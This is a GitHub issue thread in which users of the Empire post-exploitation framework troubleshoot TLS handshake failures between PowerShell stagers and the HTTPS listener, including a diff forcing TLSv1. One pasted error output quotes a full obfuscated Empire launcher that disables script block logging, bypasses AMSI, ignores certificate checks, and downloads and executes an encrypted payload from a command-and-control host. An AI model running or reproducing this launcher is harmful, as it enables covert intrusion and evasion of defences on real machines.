### ISSUE TITLE
EMP2.0: SSL negotiation failure (TLSv1)

### ISSUE THREAD

**Issue by paleos** [EmpireProject/Empire#643]
## Empire Version
EMPIRE 2.0 (final)

## OS Information (Linux flavor, Python version)
Client - Win 7 64bit (.NET Framework 4.5.2 installed, Powershell 2)
Server - Linux/KALI2

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
 Agent doesn't connect to listener. SSL negotiation error.
============================================
Secure Sockets Layer
TLSv1 Record Layer: Alert (Level: Fatal, Description: Protocol Version)
Content Type: Alert (21)
Version: TLS 1.0 (0x0301)
Alert Message
Level: Fatal (2)
Description: Protocol Version (70)
========================================

## Screenshot of error, embedded text output, or Pastebin link to the error
![image](https://user-images.githubusercontent.com/28652882/29403903-f26bc1f8-8339-11e7-9cfd-a8b2dcb51e55.png)

## Any additional information
Selfsigned certificate

**Comment by goloem** [comment]
Hello! Same error here! But I'm using cert from letsencrypt! Screen from SSL labs
![ssllabs](https://user-images.githubusercontent.com/31182162/29494827-624da77e-85bb-11e7-9ab1-72dec25a54a2.PNG)
I'm of low proficiency in ssl, but it seems that agent try to use TLS 1.0, and cert only supports TLS 1.2.

**Comment by goloem** [comment]
Also, I examine installation log from empire. In my case, it failed to compile xar-1.5.2 because of libssl and libz problems. I was able to solve this problems, but it gives no effect to ssl problem.
It would be cool if someone get some advice, how to solve this.

**Comment by dchrastil** [comment]
Can you guys please post your listener settings (remove sensitive info) so we can see how you have it configured.

**Comment by cyberdecode** [comment]
Ive been experiencing the same issue using the http Listener defaults. I was receiving this error in both the master and dev branches.

Created a PowerShell multi/launcher stager for a Windows target, and received the TLSv1.0 error. I think PowerShell is connecting via TLS v1.0 and the Empire listener is rejecting it.

By adding the following code to the start of my PowerShell stager, I am able to get Agents to connect over https: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;

So far, that has only worked for Windows targets running PS 5

**Comment by goloem** [comment]
@dchrastil take a look, please
![listener](https://user-images.githubusercontent.com/31182162/29686101-603458da-8920-11e7-8f59-0ca11cd5ceb4.JPG)

**Comment by xorrior** [comment]
@paleos Can you post the output from running empire --debug 2 during the staging process. Also, comment out the $ErrorAction preference line in stager.ps1 and remove "-w 1" from the launcher. We will need as much info as possible to debug. Thanks

**Comment by xorrior** [comment]
You'll need to comment out this line: https://github.com/EmpireProject/Empire/blob/master/data/agent/stagers/http.ps1#L59

**Comment by goloem** [comment]
@xorrior Ok, thanks you. I was able to do alter stager, but with no new info. So, I have only above-mentioned errors. There is no any single line in Empire interface in debug mode, when I start empire on client. But http agent on 80 port works pretty well.
Any thoughts?

**Comment by e0x70i** [comment]
Same issue on my end. 

The empire listener is started with an ssl context that only accepts TLSv12. system.net.webclient won't connect to TLSv2 by default, and I don't know of a way to force the stager to in powershell v2 

Fixed it by setting TLSv1 explictly in the SSL context created in http.py.

Instead of just passing a tuple to app.run, manually creating the SSLContext object with ssl.PROTOCOL_TLSv1 allows the stager to connect 

```
diff --git a/lib/listeners/http.py b/lib/listeners/http.py
index fe625b0..d36cc78 100644
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -2,6 +2,7 @@ import logging
 import base64
 import random
 import os
+import ssl
 import time
 import copy
 from pydispatch import dispatcher
@@ -878,7 +879,8 @@ def send_message(packets=None):
             host = listenerOptions['Host']['Value']
             if certPath.strip() != '' and host.startswith('https'):
                certPath = os.path.abspath(certPath)
-               context = ("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key"  % (certPath))
+               context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
+                context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key"  % (certPath))
                 app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
             else:
                 app.run(host=bindIP, port=int(port), threaded=True)

```

SSL Stagers work fine after that change

**Comment by xorrior** [comment]
@e0x70i Do you mind submitting a PR for this???

**Comment by xorrior** [comment]
@e0x70i I implemented your fix. Seems to be working, thanks!

**Comment by utkusen** [comment]
Last commit still doesn't fix my problem. My attacker machine is Ubuntu 16.04 located in Digitalocean, it's not behind NAT so local ip is same with external ip. Here is my listener settings: https://i.imgur.com/UumNrAR.png

This is the traffic capture from victim machine: https://i.imgur.com/7FDWpzt.png Connection stays in this position for a long time then client sends FIN packet.

@e0x70i Could you please send your listener settings if latest commit works for you?

**Comment by e0x70i** [comment]
Hi @utkusen, are you sure you are on the commit with the fix? Xorrior posted it 10 hours ago but your comment is from 12 hours ago. https://github.com/EmpireProject/Empire/commits/master 

Here is my working listener settings: 
![image](https://user-images.githubusercontent.com/18584157/29948994-bee0805c-8e66-11e7-986b-0806f229b2c5.png)

**Comment by e0x70i** [comment]
@utkusen can you run the stager without the '-w 1' flag and post the errors that come up?

**Comment by utkusen** [comment]
@e0x70i I tried with latest master branch (today) still no luck. You can find the error message when I  used the stager without -w 1 flag

```
You cannot call a method on a null-valued expression.
At line:1 char:157
+ $GRoUPPOLicYSeTtINGS = [ref].AsSeMBlY.GETTYpe('System.Management.Automation.U
tils')."GETFiE`lD"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GeTVALuE
 <<<< ($nULl);$GROuPPOLIcySETtINGS['ScriptB'+'lockLogging']['EnableScriptB'+'lo
ckLogging'] = 0;$GRouPPOlIcYSETtIngs['ScriptB'+'lockLogging']['EnableScriptBloc
kInvocationLogging'] = 0;[Ref].ASSEMBlY.GETTYPE('System.Management.Automation.A
msiUtils')|?{$_}|%{$_.GetFiElD('amsiInitFailed','NonPublic,Static').SeTVAlUe($n
uLl,$trUe)};[SYSTem.NET.SErvIcePointManaGEr]::EXpECT100ContiNUE=0;$WC=New-OBJec
t SySTEm.NET.WeBCLIEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:
11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidation
Callback = {$true};$wc.HeAders.Add('User-Agent',$u);$wc.PRoxy=[SYsteM.Net.WEbRe
QUESt]::DEfAultWEbProXY;$wc.ProXY.CrEDeNTials = [SyStem.NEt.CreDENtIALCAcHE]::D
eFAulTNEtWOrKCrEDEntialS;$K=[SystEM.TExt.EncodinG]::ASCII.GETByTEs('>UT(vS[1f05
OxnY@&D?pb#r:3.H/j!By');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%
$K.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%2
56;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.HEAderS.AdD
("Cookie","session=cZcTBg4sapIQip4O9vUaB7Vr9+M=");$ser='https://x.x.x.x
:443';$t='/admin/get.php';$dATA=$WC.DOWNLOaDDAta($SeR+$T);$iv=$dATa[0..3];$DATa
=$DAtA[4..$datA.LENGTH];-JOin[Char[]](& $R $Data ($IV+$K))|IEX
    + CategoryInfo          : InvalidOperation: (GeTVALuE:String) [], RuntimeE
   xception
    + FullyQualifiedErrorId : InvokeMethodOnNull

Cannot index into a null array.
At line:1 char:186
+ $GRoUPPOLicYSeTtINGS = [ref].AsSeMBlY.GETTYpe('System.Management.Automation.U
tils')."GETFiE`lD"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GeTVALuE
($nULl);$GROuPPOLIcySETtINGS[ <<<< 'ScriptB'+'lockLogging']['EnableScriptB'+'lo
ckLogging'] = 0;$GRouPPOlIcYSETtIngs['ScriptB'+'lockLogging']['EnableScriptBloc
kInvocationLogging'] = 0;[Ref].ASSEMBlY.GETTYPE('System.Management.Automation.A
msiUtils')|?{$_}|%{$_.GetFiElD('amsiInitFailed','NonPublic,Static').SeTVAlUe($n
uLl,$trUe)};[SYSTem.NET.SErvIcePointManaGEr]::EXpECT100ContiNUE=0;$WC=New-OBJec
t SySTEm.NET.WeBCLIEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:
11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidation
Callback = {$true};$wc.HeAders.Add('User-Agent',$u);$wc.PRoxy=[SYsteM.Net.WEbRe
QUESt]::DEfAultWEbProXY;$wc.ProXY.CrEDeNTials = [SyStem.NEt.CreDENtIALCAcHE]::D
eFAulTNEtWOrKCrEDEntialS;$K=[SystEM.TExt.EncodinG]::ASCII.GETByTEs('>UT(vS[1f05
OxnY@&D?pb#r:3.H/j!By');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%
$K.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%2
56;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.HEAderS.AdD
("Cookie","session=cZcTBg4sapIQip4O9vUaB7Vr9+M=");$ser='https://x.x.x.x
:443';$t='/admin/get.php';$dATA=$WC.DOWNLOaDDAta($SeR+$T);$iv=$dATa[0..3];$DATa
=$DAtA[4..$datA.LENGTH];-JOin[Char[]](& $R $Data ($IV+$K))|IEX
    + CategoryInfo          : InvalidOperation: (ScriptBlockLogging:String) []
   , RuntimeException
    + FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:1 char:267
+ $GRoUPPOLicYSeTtINGS = [ref].AsSeMBlY.GETTYpe('System.Management.Automation.U
tils')."GETFiE`lD"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GeTVALuE
($nULl);$GROuPPOLIcySETtINGS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogg
ing'] = 0;$GRouPPOlIcYSETtIngs[ <<<< 'ScriptB'+'lockLogging']['EnableScriptBloc
kInvocationLogging'] = 0;[Ref].ASSEMBlY.GETTYPE('System.Management.Automation.A
msiUtils')|?{$_}|%{$_.GetFiElD('amsiInitFailed','NonPublic,Static').SeTVAlUe($n
uLl,$trUe)};[SYSTem.NET.SErvIcePointManaGEr]::EXpECT100ContiNUE=0;$WC=New-OBJec
t SySTEm.NET.WeBCLIEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:
11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidation
Callback = {$true};$wc.HeAders.Add('User-Agent',$u);$wc.PRoxy=[SYsteM.Net.WEbRe
QUESt]::DEfAultWEbProXY;$wc.ProXY.CrEDeNTials = [SyStem.NEt.CreDENtIALCAcHE]::D
eFAulTNEtWOrKCrEDEntialS;$K=[SystEM.TExt.EncodinG]::ASCII.GETByTEs('>UT(vS[1f05
OxnY@&D?pb#r:3.H/j!By');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%
$K.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%2
56;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.HEAderS.AdD
("Cookie","session=cZcTBg4sapIQip4O9vUaB7Vr9+M=");$ser='https://x.x.x.x
:443';$t='/admin/get.php';$dATA=$WC.DOWNLOaDDAta($SeR+$T);$iv=$dATa[0..3];$DATa
=$DAtA[4..$datA.LENGTH];-JOin[Char[]](& $R $Data ($IV+$K))|IEX
    + CategoryInfo          : InvalidOperation: (ScriptBlockLogging:String) []
   , RuntimeException
    + FullyQualifiedErrorId : NullArray
```

**Comment by xorrior** [comment]
@utkusen Those errors are particular to the reflection based amsi and scriptblocklogging bypasses in the launcher. You should still receive an empire agent. Now when you run the launcher, the console return to receive input? If it hangs, your agent is still running.
